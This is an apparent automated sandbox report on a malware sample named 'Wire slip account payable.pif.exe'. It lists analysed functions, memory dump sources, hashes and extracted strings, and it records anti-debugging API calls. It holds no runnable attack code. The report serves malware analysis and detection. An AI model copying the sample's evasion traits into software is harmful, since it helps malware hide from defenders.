Snapshot File: hcaresult_0_2_7490000_Wire slip account payable.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7013f122a49dcf9b4527446c7402e32d493dd5c221d7520763c6da1400289fe8
Instruction ID: 81aea6a685a017a914f5e69158806704f463910fc399352b49e1affa3f68eea2
Opcode Fuzzy Hash: 7013f122a49dcf9b4527446c7402e32d493dd5c221d7520763c6da1400289fe8
Instruction Fuzzy Hash: 7BE1F9B4E101199FCB15DFA9C5809AEFBF2BF89304F24816AE414AB356DB31AD41CF61

Function 0155D51C Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1739210473.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1550000_Wire slip account payable.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0b1596ae4f4efb0bf6efdd0bf3e25708859f2fef49d0b618e829b934fbcbad4
Instruction ID: d6eb240af83c8ca4f34330ac9389a4ad904e85e6177e156b00aedd49aa01fe8a
Opcode Fuzzy Hash: b0b1596ae4f4efb0bf6efdd0bf3e25708859f2fef49d0b618e829b934fbcbad4
Instruction Fuzzy Hash: 19A17E32E1020A8FCF15DFB4C85459EBBB6FF85300B1585ABE906AF265DB31E946CB40

Function 07495758 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1746001725.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7490000_Wire slip account payable.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9946016e9c8767eb59d488683c81df52206312651400898bfc6b2334657cfe8
Instruction ID: b6dd56a98238254e54895b0d20258df7802854e139e2b5989b88730ac702574a
Opcode Fuzzy Hash: a9946016e9c8767eb59d488683c81df52206312651400898bfc6b2334657cfe8
Instruction Fuzzy Hash: A651F8B1E002198BCB15DFA9C5805EEFBF2BB89304F24816AD418A7356DB319942CFA1

Function 07495FC7 Relevance: .1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1746001725.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7490000_Wire slip account payable.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31a9e66f9661c35dcdbbb35a24cd0620d135ee504898a535bda6056ddaf80c24
Instruction ID: c4e99c7e3c17996ac2ba2ebdd925c7607573e017fd72db5c1db070eb2a357c28
Opcode Fuzzy Hash: 31a9e66f9661c35dcdbbb35a24cd0620d135ee504898a535bda6056ddaf80c24
Instruction Fuzzy Hash: 2A51F9B5E102198FCB14DFA9D9805EEFBF2BF89304F24816AD418A7316DB319941CFA1

Analysis Process: Wire slip account payable.pif.exePID: 7432, Parent PID: 1596COMMON

Execution Graph

Execution Coverage:	9.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	4.9%
Total number of Nodes:	61
Total number of Limit Nodes:	7

Executed Functions

Function 06853070 Relevance: 8.0, Strings: 6, Instructions: 545
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 0685379F
$^q, xrefs: 06853746
$^q, xrefs: 06853793
$^q, xrefs: 0685377B
$^q, xrefs: 0685376F
$^q, xrefs: 06853752

Memory Dump Source

Source File: 00000008.00000002.4171647473.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6850000_Wire slip account payable.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-2392861976
Opcode ID: 318847b5b94e23bc4b32f4e84b04b3700e4554046643d4e9fa6757c68a836f4d
Instruction ID: 1cce13b10be976dad388d48011164b6794746238849e76f2d4a80d8fede93886
Opcode Fuzzy Hash: 318847b5b94e23bc4b32f4e84b04b3700e4554046643d4e9fa6757c68a836f4d
Instruction Fuzzy Hash: 4C321F35E1071ACFCB14EF75D89469DB7B6BF89340F11C6A9D409AB224EB30AD85CB81

Function 06857DA0 Relevance: 3.0, Strings: 2, Instructions: 479
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 068580DD
$^q, xrefs: 068580E9

Memory Dump Source

Source File: 00000008.00000002.4171647473.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6850000_Wire slip account payable.jbxd

Similarity

API ID:
String ID: $^q$$^q
API String ID: 0-355816377
Opcode ID: 3150a57c207ccf420a22e72ed6c1300a80c7352a629c75abe169a15a48021016
Instruction ID: 8331b6733f08eec082093ab913c7dcbcfd1e9dff334c629b7facec45f250af1d
Opcode Fuzzy Hash: 3150a57c207ccf420a22e72ed6c1300a80c7352a629c75abe169a15a48021016
Instruction Fuzzy Hash: 3C02BD34B012159FDB54DF68D9906AEB7E2FF84304F15842AD906EB398DB35EC86CB81

Function 068555A0 Relevance: 1.8, Strings: 1, Instructions: 600COMMON

Download Yara Rule

Strings

$, xrefs: 06855C72

Memory Dump Source

Source File: 00000008.00000002.4171647473.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6850000_Wire slip account payable.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-3993045852
Opcode ID: c83c1150ad9103ba1defb4cb3694989701c3a3b3973ad24e120ab723a8f50adc
Instruction ID: 4ada1af01851478e93d79d0e298418c92ee3dfc68932923bd539e34b8d3c6265
Opcode Fuzzy Hash: c83c1150ad9103ba1defb4cb3694989701c3a3b3973ad24e120ab723a8f50adc
Instruction Fuzzy Hash: A222C035E102198FDF64DBA8C4846AEBBF2EF89324F118469DA05EB354DB31DD41CB92

Function 011B7050 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 011B70C7

Memory Dump Source

Source File: 00000008.00000002.4158958257.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_11b0000_Wire slip account payable.jbxd

Similarity

API ID: CheckDebuggerPresentRemote
String ID:
API String ID: 3662101638-0
Opcode ID: f1ee3b302896b738c7c2b360b87053b2d39fa1eec537995c9b9a0711a129e23d
Instruction ID: 3066b40b99d6c279c40dfadc24adc283b839c0e423263511ad80d34822e7e592
Opcode Fuzzy Hash: f1ee3b302896b738c7c2b360b87053b2d39fa1eec537995c9b9a0711a129e23d
Instruction Fuzzy Hash: 4A2128B1800259CFCB14CF9AD584BEEBBF4EF49320F14846AE455A7250D778A944CF65

Function 06852348 Relevance: 1.0, Instructions: 1004COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4171647473.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6850000_Wire slip account payable.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a588ad9ac4e33d6879d94cef8a92a8451f4f2022112ab13bc4978207c624d91
Instruction ID: a5bac7c719960d293b33118a6f6cb7a12e360ec48af4e07f07fb8c25c4448793
Opcode Fuzzy Hash: 7a588ad9ac4e33d6879d94cef8a92a8451f4f2022112ab13bc4978207c624d91
Instruction Fuzzy Hash: 1E925734A00204CFDB64DB68C594A6DBBF2FB44314F56C4AAD949EB361EB35ED85CB80

Function 06856610 Relevance: .8, Instructions: 823COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4171647473.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6850000_Wire slip account payable.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7fff2750eb49533eb6af8deb33c3399e56c4cd47ecc5416aaa631021f5d4fb3c
Instruction ID: 809598d788ea8172c04dd6cf518eec14afd4e8a95c339ff98ce4b5b600c86391
Opcode Fuzzy Hash: 7fff2750eb49533eb6af8deb33c3399e56c4cd47ecc5416aaa631021f5d4fb3c
Instruction Fuzzy Hash: 6D62D134B002048FDB54DB68D580BADB7F2EF88314F558469E906EB361EB35ED86CB81

Function 0685C1A0 Relevance: .7, Instructions: 656COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4171647473.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6850000_Wire slip account payable.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52a6ceda9a5cfd309b0327018fdf17d1969bf21104888b04a8bbe70277f52feb
Instruction ID: 67bd61301ac800a44ec0a159c77a1dd9fab48acc18ba82d19299edbed6049319
Opcode Fuzzy Hash: 52a6ceda9a5cfd309b0327018fdf17d1969bf21104888b04a8bbe70277f52feb
Instruction Fuzzy Hash: 9C329E34B003098FDB54DB68D980AAEB7F2EB88314F118529E906EB355DB34EC46CF91

Function 0685B248 Relevance: .6, Instructions: 570COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4171647473.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6850000_Wire slip account payable.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f09f9fbd859bb2acbe901caa3797789d12279ba4471fd0daf7cc13add7114256
Instruction ID: 3d9c7cd20541fdb31ca77b2f74f72b46623c4d4fa0735987b81004cc10ba5449
Opcode Fuzzy Hash: f09f9fbd859bb2acbe901caa3797789d12279ba4471fd0daf7cc13add7114256
Instruction Fuzzy Hash: CB228034E002099FDF64DB68D5A07AEB7F2EB59310F218826E909EB391DB35DC85CB51

Function 0685ACF0 Relevance: 10.4, Strings: 8, Instructions: 392
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 0685AEBC
$^q, xrefs: 0685AEC8
$^q, xrefs: 0685AE93
$^q, xrefs: 0685AE1D
$^q, xrefs: 0685AE11
$^q, xrefs: 0685AE64
$^q, xrefs: 0685AE9F
$^q, xrefs: 0685AE70

Memory Dump Source

Source File: 00000008.00000002.4171647473.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6850000_Wire slip account payable.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-3823777903
Opcode ID: 0b941bc2528ff52de614197cf59d3ac4117d51f1c27a3eb80b5071d904d52c81
Instruction ID: 1a8af80d1a0f41d0f7f7512b765f5cc11f5e20980319a714318d9c2bacfd0592
Opcode Fuzzy Hash: 0b941bc2528ff52de614197cf59d3ac4117d51f1c27a3eb80b5071d904d52c81
Instruction Fuzzy Hash: 25E19F30E102098FDF69EF68D5906AEB7B2EF89304F218629D905EB355DB70DC46CB91

Function 0685B668 Relevance: 8.0, Strings: 6, Instructions: 467
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 0685BC07
$^q, xrefs: 0685BB93
$^q, xrefs: 0685BB9F
$^q, xrefs: 0685BBD3
$^q, xrefs: 0685BBC7
$^q, xrefs: 0685BBFB

Memory Dump Source

Source File: 00000008.00000002.4171647473.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6850000_Wire slip account payable.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-2392861976
Opcode ID: 3d84f10127caec08a66890371f3a306c11c1de300b8c93e75fbfdc65cc246fb2
Instruction ID: 0e2f23bb8d7a54ec7864d219fff52e8d6a865852e5b9c1e62c0eee9aa34afd06
Opcode Fuzzy Hash: 3d84f10127caec08a66890371f3a306c11c1de300b8c93e75fbfdc65cc246fb2
Instruction Fuzzy Hash: 4C029B30E002098FDB64DF68D5A06ADB7F2FB55314F22896AE909EB355DB31DC85CB81

Function 0685CF60 Relevance: 7.1, Strings: 5, Instructions: 803
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

HM, xrefs: 0685D45E
HM, xrefs: 0685CF82
$^q, xrefs: 0685D35F
$^q, xrefs: 0685D357
$^q, xrefs: 0685D36B

Memory Dump Source

Source File: 00000008.00000002.4171647473.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6850000_Wire slip account payable.jbxd

Similarity

API ID:
String ID: HM$HM$$^q$$^q$$^q
API String ID: 0-822121483
Opcode ID: 328a2fc2b4b5361463e537e76658ba7eba2feea6abec1d1976de1981aaf95772
Instruction ID: 15a738383e43a70c8525b1b810b0d5db9479c276e847e8af4e369f1cfd23702e
Opcode Fuzzy Hash: 328a2fc2b4b5361463e537e76658ba7eba2feea6abec1d1976de1981aaf95772
Instruction Fuzzy Hash: 08626130A002058FCB55EB68D690A5DB7F2FF84304B218929D819DF769DB75ED8ACB84

Function 06859170 Relevance: 5.2, Strings: 4, Instructions: 230
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 068591F2
$^q, xrefs: 068591FE
$^q, xrefs: 068591C3
$^q, xrefs: 068591B7

Memory Dump Source

Source File: 00000008.00000002.4171647473.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6850000_Wire slip account payable.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q
API String ID: 0-2125118731
Opcode ID: 47831695476abc0ae01ccb8811d84bced67eac3b9e6c09a7a48c31b1d5c385da
Instruction ID: fdc549e7f6ca1ae7d4270a57bc41a7f2b3bd11e37562872c8f6c30f4ea7b4a9d
Opcode Fuzzy Hash: 47831695476abc0ae01ccb8811d84bced67eac3b9e6c09a7a48c31b1d5c385da
Instruction Fuzzy Hash: 87917E34F0021A9FDF54DB68D9507AEB7F6AFC9204F108469C909EB398EB74DC468B91

Function 06854B70 Relevance: 3.9, Strings: 3, Instructions: 186
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

fcq, xrefs: 06854B9B
XPcq, xrefs: 06854CC1
\Ocq, xrefs: 06854D4B

Memory Dump Source

Source File: 00000008.00000002.4171647473.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6850000_Wire slip account payable.jbxd

Similarity

API ID:
String ID: fcq$XPcq$\Ocq
API String ID: 0-3575482020
Opcode ID: 195d4601afce0dacbea43b0bbf7964be905c29396868e42da69b194485bca0e2
Instruction ID: ef22f3d78a489c7d281871ada42eacf5b3a9bd1b34dac0a31e45b452a200f3a3
Opcode Fuzzy Hash: 195d4601afce0dacbea43b0bbf7964be905c29396868e42da69b194485bca0e2
Instruction Fuzzy Hash: 40617F30F002189FEB549FB8C8547AEBBF6FB88750F208429E506EB395DB758D458B91

Function 06859163 Relevance: 2.7, Strings: 2, Instructions: 161
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 068591F2
$^q, xrefs: 068591B7

Memory Dump Source

Source File: 00000008.00000002.4171647473.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6850000_Wire slip account payable.jbxd

Similarity

API ID:
String ID: $^q$$^q
API String ID: 0-355816377
Opcode ID: d9f57417221f1b79c1d382bd2e847df827ea227ecd31638dbc820c1d2b1b1283
Instruction ID: 65338fc8960582c5196221fe89e9370cc7d95f153296ac9e8f2f804d834a583d
Opcode Fuzzy Hash: d9f57417221f1b79c1d382bd2e847df827ea227ecd31638dbc820c1d2b1b1283
Instruction Fuzzy Hash: D8517334B00205AFDF54DB74D950BAFB7F6ABC8644F108469C909EB398EB74DC428B95

Function 06854B60 Relevance: 2.6, Strings: 2, Instructions: 146
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

fcq, xrefs: 06854B9B
XPcq, xrefs: 06854CC1

Memory Dump Source

Source File: 00000008.00000002.4171647473.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6850000_Wire slip account payable.jbxd

Similarity

API ID:
String ID: fcq$XPcq
API String ID: 0-936005338
Opcode ID: ff1a103480ffa54cdaf5cf8fb1dc22967fae67d3a154a3066fa75f8ef359262d
Instruction ID: 0a650eb2b51dc033b90784e0d093d6a55cd49c87498a848a0548a646f837a9f4
Opcode Fuzzy Hash: ff1a103480ffa54cdaf5cf8fb1dc22967fae67d3a154a3066fa75f8ef359262d
Instruction Fuzzy Hash: 61518E30F002189FDB549FB8C854BAEBBF7EB88710F208529E505EB395DB758C458B92

Function 0694FC28 Relevance: 1.7, APIs: 1, Instructions: 201
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000008.00000002.4171986917.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6940000_Wire slip account payable.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: a0c04d0f61dea06a243267ccdec913755daa731bdf341c9bb1361f7d5ba714c3
Instruction ID: 1cc3060bef08c763e5aae8311017b94296d124be04c1f5c636ccb9e4abd70450
Opcode Fuzzy Hash: a0c04d0f61dea06a243267ccdec913755daa731bdf341c9bb1361f7d5ba714c3
Instruction Fuzzy Hash: 69813570A00B058FD7A4EF29D544B5ABBF5FF88304F10892ED48AD7A50D775E949CB90

Function 011BEFC0 Relevance: 1.6, APIs: 1, Instructions: 143
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000008.00000002.4158958257.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_11b0000_Wire slip account payable.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 399aa7ca9d840f2bea8cb5d923bb69d63dd7a803672c1594184b3af972062e7a
Instruction ID: d5f94326de2c1705f48ef9c9d9798e326af0416cf5eed4b1cd1e29f8c6a383fc
Opcode Fuzzy Hash: 399aa7ca9d840f2bea8cb5d923bb69d63dd7a803672c1594184b3af972062e7a
Instruction Fuzzy Hash: 38414472D0438A9FC714CF79D8002EABFF5AF8A310F0585AAD544E7261DB349845CBE2

Function 011B704A Relevance: 1.6, APIs: 1, Instructions: 66COMMON

Download Yara Rule

APIs

CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 011B70C7

Memory Dump Source

Source File: 00000008.00000002.4158958257.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_11b0000_Wire slip account payable.jbxd

Similarity

API ID: CheckDebuggerPresentRemote
String ID:
API String ID: 3662101638-0
Opcode ID: 847c42bcda355eb778751f2bdaac89e62475c3ba00b88cfbdf307ee368ef25ec
Instruction ID: 128e2644a149c263936a7d985c1925d5241ce452901f03355bfbf9c8c3d1eb6d
Opcode Fuzzy Hash: 847c42bcda355eb778751f2bdaac89e62475c3ba00b88cfbdf307ee368ef25ec
Instruction Fuzzy Hash: A72116B1C00259CFCB14CF9AD584BEEBBF4EF49320F14846AE855A7290D7789944CF61

Function 011BF0A8 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNELBASE ref: 011BF10F

Memory Dump Source

Source File: 00000008.00000002.4158958257.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_11b0000_Wire slip account payable.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: f81be45c4a71fb4af954c735abe64edb7fbdbbee969a9ee722b784893547b7ba
Instruction ID: 305ad9316518522c25eaa53f079575b6c249794f7043b6d4ba1eeab44634056e
Opcode Fuzzy Hash: f81be45c4a71fb4af954c735abe64edb7fbdbbee969a9ee722b784893547b7ba
Instruction Fuzzy Hash: 201120B1C0066A9BCB10DF9AC944BDEFBF4EF48320F10812AD818B7240D378A940CFA5

Function 0694EB7C Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,0694FC44), ref: 0694FE7E

Memory Dump Source

Source File: 00000008.00000002.4171986917.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6940000_Wire slip account payable.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 98510e60907692942742f3f916099d2c066b23c99118dd30a006d8a3427d2918
Instruction ID: ebc9aecf12addb2ae1e5884622ca70b7b4f0fba4842f1de46535c317d19e3a72
Opcode Fuzzy Hash: 98510e60907692942742f3f916099d2c066b23c99118dd30a006d8a3427d2918
Instruction Fuzzy Hash: A21132B1C007098FCB10DF9AD544AEFFBF4EB88320F10842AD919A7601C375A945CFA1

Function 0685DAD5 Relevance: 1.4, Strings: 1, Instructions: 126COMMON

Download Yara Rule

Strings

PH^q, xrefs: 0685DC31

Memory Dump Source

Source File: 00000008.00000002.4171647473.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6850000_Wire slip account payable.jbxd

Similarity

API ID:
String ID: PH^q
API String ID: 0-2549759414
Opcode ID: 30acde6026f72fbc7c0da482dcaef708656b2207f7d0e052c1ca8e314cf3ff53
Instruction ID: c9172d6ce73d4d08d98e49ef3723126aba84e61446088196c75a754409893bcf
Opcode Fuzzy Hash: 30acde6026f72fbc7c0da482dcaef708656b2207f7d0e052c1ca8e314cf3ff53
Instruction Fuzzy Hash: 1C41BE30E04349CFDB65DFA4C45429EBBB2FF86344F114929DD15EB244EB709946CB86

Function 068521BF Relevance: 1.4, Strings: 1, Instructions: 107COMMON

Download Yara Rule

Strings

PH^q, xrefs: 0685230B

Memory Dump Source

Source File: 00000008.00000002.4171647473.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6850000_Wire slip account payable.jbxd

Similarity

API ID:
String ID: PH^q
API String ID: 0-2549759414
Opcode ID: 45ad108f1d05ad9d229c6929b8a86c8fe6343b0857698af07824016c2d07fa7c
Instruction ID: c860232d7554ee90b68a2c72647d76a819ede548ca142a7461babc507733950c
Opcode Fuzzy Hash: 45ad108f1d05ad9d229c6929b8a86c8fe6343b0857698af07824016c2d07fa7c
Instruction Fuzzy Hash: 59311230B002019FCB999BB4C56466FBBE2AF89340F154478D806DB395EF36DE46C791

Function 068521D0 Relevance: 1.4, Strings: 1, Instructions: 105COMMON

Download Yara Rule

Strings

PH^q, xrefs: 0685230B

Memory Dump Source

Source File: 00000008.00000002.4171647473.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6850000_Wire slip account payable.jbxd

Similarity

API ID:
String ID: PH^q
API String ID: 0-2549759414
Opcode ID: a715ee7ad9b51a409188bbd3f3eb57df9b291ff8b81e932b69a9585ee12257f1
Instruction ID: 15052b9db8a5249ac806581f72ff5ba03721f5759d17282aab52192007c2040d
Opcode Fuzzy Hash: a715ee7ad9b51a409188bbd3f3eb57df9b291ff8b81e932b69a9585ee12257f1
Instruction Fuzzy Hash: E631CF34B002058FDB59ABB4D56466FBBE2AF89740F104438D806EB395DF36DE46C7A1

Function 0685FE28 Relevance: 1.3, Strings: 1, Instructions: 65COMMON

Download Yara Rule

Strings

|, xrefs: 0685FE88

Memory Dump Source

Source File: 00000008.00000002.4171647473.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6850000_Wire slip account payable.jbxd

Similarity

API ID:
String ID: |
API String ID: 0-2343686810
Opcode ID: 21b7c10fb00673a83d45be886bd40d6cdd97e21a2fd327a739e858349bc0636d
Instruction ID: 13c854a6aee3e7baaf237d65e56fbc6259030f26061b9c06f6b5156bc09bb487
Opcode Fuzzy Hash: 21b7c10fb00673a83d45be886bd40d6cdd97e21a2fd327a739e858349bc0636d
Instruction Fuzzy Hash: 9F219330B002159FDB94DB78D808A5EBBF5AF88610F10446DEA1ADB3A5DB359901CB81

Function 0685FE38 Relevance: 1.3, Strings: 1, Instructions: 59COMMON

Download Yara Rule

Strings

|, xrefs: 0685FE88

Memory Dump Source

Source File: 00000008.00000002.4171647473.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6850000_Wire slip account payable.jbxd

Similarity

API ID:
String ID: |
API String ID: 0-2343686810
Opcode ID: f168f40e69b52ed3c8cda4a0f4aba2bcf4cbdc7746e8bb7c46bc7efee5c1619e
Instruction ID: fcd7a0714b02acd1744d6f40d43cde082183dcd795fc618eabb03c2622780b54
Opcode Fuzzy Hash: f168f40e69b52ed3c8cda4a0f4aba2bcf4cbdc7746e8bb7c46bc7efee5c1619e
Instruction Fuzzy Hash: 1D115E74B002159FDB44EB78D804B6EBBF5AF48714F10846AEA0ADB3A4DB359D008B95

Function 06854659 Relevance: 1.3, Strings: 1, Instructions: 25COMMON

Download Yara Rule

Strings

\Ocq, xrefs: 06854665

Memory Dump Source

Source File: 00000008.00000002.4171647473.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6850000_Wire slip account payable.jbxd

Similarity

API ID:
String ID: \Ocq
API String ID: 0-2995510325
Opcode ID: e812c10d6eb53f03401d5747165cd5d3740e485133c90f50f971cd5d9d2b5f5e
Instruction ID: 8eb0eb9a3888e4bd624056f8bc48213c89f9fadd68113cbc3e0687e1464d5628
Opcode Fuzzy Hash: e812c10d6eb53f03401d5747165cd5d3740e485133c90f50f971cd5d9d2b5f5e
Instruction Fuzzy Hash: EBF0DA30A10219DFDB54DF94E859BAEBBF2BF88710F204119E502A7294CB741D85CF80

Function 06856210 Relevance: .2, Instructions: 229COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4171647473.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6850000_Wire slip account payable.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f2a6b60b7ea7b240c49adc2baa86931044d57ad823606659b5281c6d446ce3d3
Instruction ID: 76ffae192803a31ce40b0188e1ba270ae28b7805a91629dac88667cb135f0973
Opcode Fuzzy Hash: f2a6b60b7ea7b240c49adc2baa86931044d57ad823606659b5281c6d446ce3d3
Instruction Fuzzy Hash: 7461E071F000214FDF509A7DC88466FBAD7AFC8620B66443AD90EDB364EEA5DD4287C2

Function 06853EA9 Relevance: .2, Instructions: 226COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4171647473.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6850000_Wire slip account payable.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24de07242e64f6346259de8e47383950f0ae3ee6abc1062a2b8f3b8c6f0b7eef
Instruction ID: de53f93d6b7fd0ee85e172d8797655669b3d01fa31cf723b6f272a36e6702026
Opcode Fuzzy Hash: 24de07242e64f6346259de8e47383950f0ae3ee6abc1062a2b8f3b8c6f0b7eef
Instruction Fuzzy Hash: 83816F30B002099FDF54DFA9D55076EB7F2AF89354F218429D90ADB394EB74EC868B81

Function 068541C4 Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4171647473.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6850000_Wire slip account payable.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ef149250159ffce0b48b039b0de7ac4d4d31ae888d5b5673838052ccd8f6b94
Instruction ID: 8e9550eea086b7bea41dce976e8753802bf6412afa9fd356772ae6f6e443ed01
Opcode Fuzzy Hash: 9ef149250159ffce0b48b039b0de7ac4d4d31ae888d5b5673838052ccd8f6b94
Instruction Fuzzy Hash: 75914B30E102198BDF60DF68C880B9DB7B1FF89314F208699D549FB255EB71AA85CF91

Function 068541D8 Relevance: .2, Instructions: 210COMMON

Download Yara Rule

Memory Dump Source

